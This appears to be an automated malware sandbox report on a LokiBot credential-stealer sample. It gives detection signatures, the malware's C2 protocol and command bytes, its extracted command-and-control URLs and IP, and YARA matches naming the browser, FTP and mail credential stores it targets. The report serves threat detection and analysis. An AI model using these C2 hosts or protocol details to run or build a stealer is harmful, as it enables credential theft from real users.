Edit tour

Windows Analysis Report
Mcx2Xk0fqn.exe

Overview

General Information

Sample name:	Mcx2Xk0fqn.exe renamed because original name is a hash value
Original sample name:	c421a43f741ad586338b3739bd812b95.exe
Analysis ID:	1501612
MD5:	c421a43f741ad586338b3739bd812b95
SHA1:	442a8888bfc86d52e838a739417f597df12a7845
SHA256:	faf6ebfff85ddb7f9f7477e5370e564b16febf619e1c865dda506e7649488815
Tags:	exeLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

.NET source code references suspicious native API functions

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Mcx2Xk0fqn.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\Mcx2Xk0fqn.exe" MD5: C421A43F741AD586338B3739BD812B95)

Mcx2Xk0fqn.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\Mcx2Xk0fqn.exe" MD5: C421A43F741AD586338B3739BD812B95)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://89.34.237.212/annonymous/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1683818444.0000000001248000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x36a41:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x23e0c:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x32650:$des3: 68 03 66 00 00 0x36a41:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x36b0d:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x33cb1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x2107c:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x30675:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x308bd:$a2: last_compatible_version
00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2f8c0:$des3: 68 03 66 00 00 0x33cb1:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x33d7d:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x32df7:$f1: FileZilla\recentservers.xml 0x32e37:$f2: FileZilla\sitemanager.xml 0x310a7:$b2: Mozilla\Firefox\Profiles 0x30e11:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x30fbb:$s4: logins.json 0x31e65:$s6: wand.dat 0x308e5:$a1: username_value 0x308d5:$a2: password_value 0x30f20:$a3: encryptedUsername 0x30f8d:$a3: encryptedUsername 0x30f33:$a4: encryptedPassword 0x30fa1:$a4: encryptedPassword
00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1d1d0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xa59b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x18ddf:$des3: 68 03 66 00 00 0x1d1d0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1d29c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x6cc11:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x59fdc:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x68820:$des3: 68 03 66 00 00 0x6cc11:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x6ccdd:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x23fbe8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x22ceb3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x23b6f7:$des3: 68 03 66 00 00 0x23fbe8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x23fcb4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: Mcx2Xk0fqn.exe PID: 7272	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Mcx2Xk0fqn.exe PID: 7272	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Mcx2Xk0fqn.exe PID: 7272	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1e89:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x123cc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x1ddca:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x29052:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x307c8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Mcx2Xk0fqn.exe PID: 7304	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Mcx2Xk0fqn.exe PID: 7304	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Mcx2Xk0fqn.exe PID: 7304	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: Mcx2Xk0fqn.exe PID: 7304	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1db7:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 43 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.Mcx2Xk0fqn.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.Mcx2Xk0fqn.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Mcx2Xk0fqn.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.Mcx2Xk0fqn.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.Mcx2Xk0fqn.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
